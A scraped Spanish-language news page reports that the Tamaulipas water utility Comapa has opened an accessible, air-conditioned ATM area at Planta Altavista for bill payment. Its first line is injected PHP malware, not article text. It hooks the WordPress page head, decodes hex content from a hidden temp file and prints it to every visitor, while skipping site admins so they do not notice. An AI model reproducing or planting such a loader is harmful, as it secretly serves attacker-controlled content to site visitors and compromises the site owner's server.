if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Comapa instala nueva área de cajeros automáticos en Planta Altavista – Reporte Noreste
Conéctate con nosotros

Sur de Tamaulipas

Comapa instala nueva área de cajeros automáticos en Planta Altavista

Comapa instala nueva área de cajeros automáticos en Planta Altavista

Con el propósito de dar un mejor servicio a los usuarios, la Comapa Zona Tam instala nueva área de cajeros automáticos en la explanada de la Planta Altavista.

Gabriel Guerra, gerente general del organismo da a conocer que, esta nueva área completamente funcional y accesible a la ciudadanía cuenta con rampa para personas con discapacidad y está climatizada.

Reiteró que día a día la Comapa busca ofrecer la mejor atención y calidad en el servicio para el bienestar de todos los usuarios, para que realicen el pago de su recibo de agua de una forma práctica, cómoda, rápida y sin tumultos.

“Los cajeros funcionan las 24 horas del día los siete días de la semana, por lo que es una buena opción para los usuarios que tienen largas jornadas de trabajo y tienen que cumplir con el pago del servicio”, destacó el funcionario.

Desde la redacción.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Sur de Tamaulipas